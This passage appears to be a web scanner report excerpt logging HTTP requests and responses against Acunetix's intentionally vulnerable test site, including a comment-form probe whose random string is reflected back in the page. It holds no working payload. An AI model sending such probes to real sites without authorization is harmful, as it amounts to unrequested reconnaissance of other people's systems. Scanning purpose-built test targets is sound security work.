Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1381 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,381 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=Send+comment
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:07 GMT Content-Length: 14360
Response Body - size: 14,360 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkAgkPZBYCAgEPZBYGZg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgEPZBYCZg8WAh4FY2xhc3MFB0NvbW1lbnRkAgIPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kZLtjZhxvUS4ci8HIFlqscBeWoXbu" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKm2I3mCQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJ0OOIIRYqVtGT38Je7OHUSHamD9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> <tr> <td><IMG src="images/comment-before.gif"></td> </tr> <tr> <td class="Comment"><DIV class="CommentAuthor">posted by <strong>96.37.113.89</strong>12/14/2022 4:42:07 AM</DIV><DIV class="CommentText">hvEYyWNN</DIV></td> </tr> <tr> <td><IMG src="images/comment-after.gif"></td> </tr> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA">hvEYyWNN</textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, 